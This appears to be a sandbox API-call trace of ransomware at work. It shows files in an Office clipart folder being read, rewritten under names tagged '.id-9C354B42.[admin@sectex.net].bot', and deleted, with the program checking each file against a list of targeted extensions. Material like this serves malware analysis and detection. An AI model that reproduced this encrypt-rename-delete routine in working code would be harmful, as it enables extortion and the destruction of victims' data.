	[0149.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.621] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1892) returned 1
	[0149.621] CloseHandle (hObject=0x3f8) returned 1
	[0149.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf")) returned 0x20
	[0149.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.682] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.682] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.696] GetLastError () returned 0x0
	[0149.696] ReadFile (in: hFile=0x3dc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x764, lpOverlapped=0x0) returned 1
	[0149.723] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x770, lpOverlapped=0x0) returned 1
	[0149.724] ReadFile (in: hFile=0x3dc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.724] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.724] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.724] CloseHandle (hObject=0x3ac) returned 1
	[0149.724] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.724] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.726] CloseHandle (hObject=0x3dc) returned 1
	[0149.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.726] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf")) returned 1
	[0149.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.727] lstrlenW (lpString=".doc") returned 4
	[0149.727] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.727] lstrlenW (lpString=".docx") returned 5
	[0149.727] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.727] lstrlenW (lpString=".pdf") returned 4
	[0149.727] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.727] lstrlenW (lpString=".xls") returned 4
	[0149.727] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.727] lstrlenW (lpString=".xlsx") returned 5
	[0149.727] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.727] lstrlenW (lpString=".ppt") returned 4
	[0149.727] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.727] lstrlenW (lpString=".zip") returned 4
	[0149.727] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.727] lstrlenW (lpString=".rar") returned 4
	[0149.727] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString=".bz2") returned 4
	[0149.728] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString=".7z") returned 3
	[0149.728] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.728] lstrlenW (lpString=".dbf") returned 4
	[0149.728] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.728] lstrlenW (lpString=".1cd") returned 4
	[0149.728] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.728] lstrlenW (lpString=".jpg") returned 4
	[0149.728] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.728] lstrlenW (lpString=".doc") returned 4
	[0149.728] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString=".docx") returned 5
	[0149.728] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.728] lstrlenW (lpString=".pdf") returned 4
	[0149.728] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString=".xls") returned 4
	[0149.728] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.728] lstrlenW (lpString=".xlsx") returned 5
	[0149.728] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.728] lstrlenW (lpString=".ppt") returned 4
	[0149.728] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.728] lstrlenW (lpString=".zip") returned 4
	[0149.728] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.729] lstrlenW (lpString=".rar") returned 4
	[0149.729] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.729] lstrlenW (lpString=".bz2") returned 4
	[0149.729] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.729] lstrlenW (lpString=".7z") returned 3
	[0149.729] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.729] lstrlenW (lpString=".dbf") returned 4
	[0149.729] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.729] lstrlenW (lpString=".1cd") returned 4
	[0149.729] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63
	[0149.729] lstrlenW (lpString=".jpg") returned 4
	[0149.729] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.729] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.729] lstrlenW (lpString="IN00956_.WMF") returned 12
	[0149.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.730] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1256) returned 1
	[0149.730] CloseHandle (hObject=0x3dc) returned 1
	[0149.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf")) returned 0x20
	[0149.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.730] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.730] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.731] GetLastError () returned 0x0
	[0149.731] ReadFile (in: hFile=0x3dc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4e8, lpOverlapped=0x0) returned 1
	[0149.741] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4f0, lpOverlapped=0x0) returned 1
	[0149.742] ReadFile (in: hFile=0x3dc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.742] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.742] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.742] CloseHandle (hObject=0x3ac) returned 1
	[0149.742] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.742] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.744] CloseHandle (hObject=0x3dc) returned 1
	[0149.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.744] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf")) returned 1
	[0149.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.745] lstrlenW (lpString=".doc") returned 4
	[0149.745] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.745] lstrlenW (lpString=".docx") returned 5
	[0149.745] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.745] lstrlenW (lpString=".pdf") returned 4
	[0149.745] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.745] lstrlenW (lpString=".xls") returned 4
	[0149.745] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.745] lstrlenW (lpString=".xlsx") returned 5
	[0149.745] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.745] lstrlenW (lpString=".ppt") returned 4
	[0149.745] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.745] lstrlenW (lpString=".zip") returned 4
	[0149.745] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.745] lstrlenW (lpString=".rar") returned 4
	[0149.745] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.745] lstrlenW (lpString=".bz2") returned 4
	[0149.745] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.745] lstrlenW (lpString=".7z") returned 3
	[0149.745] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.746] lstrlenW (lpString=".dbf") returned 4
	[0149.746] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.746] lstrlenW (lpString=".1cd") returned 4
	[0149.746] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.746] lstrlenW (lpString=".jpg") returned 4
	[0149.746] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.746] lstrlenW (lpString=".doc") returned 4
	[0149.746] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString=".docx") returned 5
	[0149.746] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.746] lstrlenW (lpString=".pdf") returned 4
	[0149.746] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString=".xls") returned 4
	[0149.746] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.746] lstrlenW (lpString=".xlsx") returned 5
	[0149.746] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.746] lstrlenW (lpString=".ppt") returned 4
	[0149.746] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.746] lstrlenW (lpString=".zip") returned 4
	[0149.746] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.746] lstrlenW (lpString=".rar") returned 4
	[0149.746] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.746] lstrlenW (lpString=".bz2") returned 4
	[0149.746] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.747] lstrlenW (lpString=".7z") returned 3
	[0149.747] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.747] lstrlenW (lpString=".dbf") returned 4
	[0149.747] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.747] lstrlenW (lpString=".1cd") returned 4
	[0149.747] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63
	[0149.747] lstrlenW (lpString=".jpg") returned 4
	[0149.747] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.747] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.747] lstrlenW (lpString="IN00957_.WMF") returned 12
	[0149.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.747] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2944) returned 1
	[0149.748] CloseHandle (hObject=0x3dc) returned 1
	[0149.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf")) returned 0x20
	[0149.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.748] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.748] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.749] GetLastError () returned 0x0
	[0149.749] ReadFile (in: hFile=0x3dc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb80, lpOverlapped=0x0) returned 1
	[0149.753] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xb90, lpOverlapped=0x0) returned 1
	[0149.754] ReadFile (in: hFile=0x3dc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.755] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.755] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.755] CloseHandle (hObject=0x3ac) returned 1
	[0149.755] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.755] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.757] CloseHandle (hObject=0x3dc) returned 1
	[0149.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.757] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf")) returned 1
	[0149.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.758] lstrlenW (lpString=".doc") returned 4
	[0149.758] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.758] lstrlenW (lpString=".docx") returned 5
	[0149.758] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.758] lstrlenW (lpString=".pdf") returned 4
	[0149.758] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.758] lstrlenW (lpString=".xls") returned 4
	[0149.758] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.758] lstrlenW (lpString=".xlsx") returned 5
	[0149.758] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.758] lstrlenW (lpString=".ppt") returned 4
	[0149.758] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.758] lstrlenW (lpString=".zip") returned 4
	[0149.758] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.758] lstrlenW (lpString=".rar") returned 4
	[0149.758] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.758] lstrlenW (lpString=".bz2") returned 4
	[0149.758] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.758] lstrlenW (lpString=".7z") returned 3
	[0149.758] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.759] lstrlenW (lpString=".dbf") returned 4
	[0149.759] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.759] lstrlenW (lpString=".1cd") returned 4
	[0149.759] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.759] lstrlenW (lpString=".jpg") returned 4
	[0149.759] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.759] lstrlenW (lpString=".doc") returned 4
	[0149.759] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString=".docx") returned 5
	[0149.759] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.759] lstrlenW (lpString=".pdf") returned 4
	[0149.759] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString=".xls") returned 4
	[0149.759] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.759] lstrlenW (lpString=".xlsx") returned 5
	[0149.759] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.759] lstrlenW (lpString=".ppt") returned 4
	[0149.759] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.759] lstrlenW (lpString=".zip") returned 4
	[0149.759] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.759] lstrlenW (lpString=".rar") returned 4
	[0149.759] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString=".bz2") returned 4
	[0149.759] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.759] lstrlenW (lpString=".7z") returned 3
	[0149.760] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.760] lstrlenW (lpString=".dbf") returned 4
	[0149.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.760] lstrlenW (lpString=".1cd") returned 4
	[0149.760] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63
	[0149.760] lstrlenW (lpString=".jpg") returned 4
	[0149.760] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.760] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0149.760] lstrlenW (lpString="J0075478.GIF") returned 12
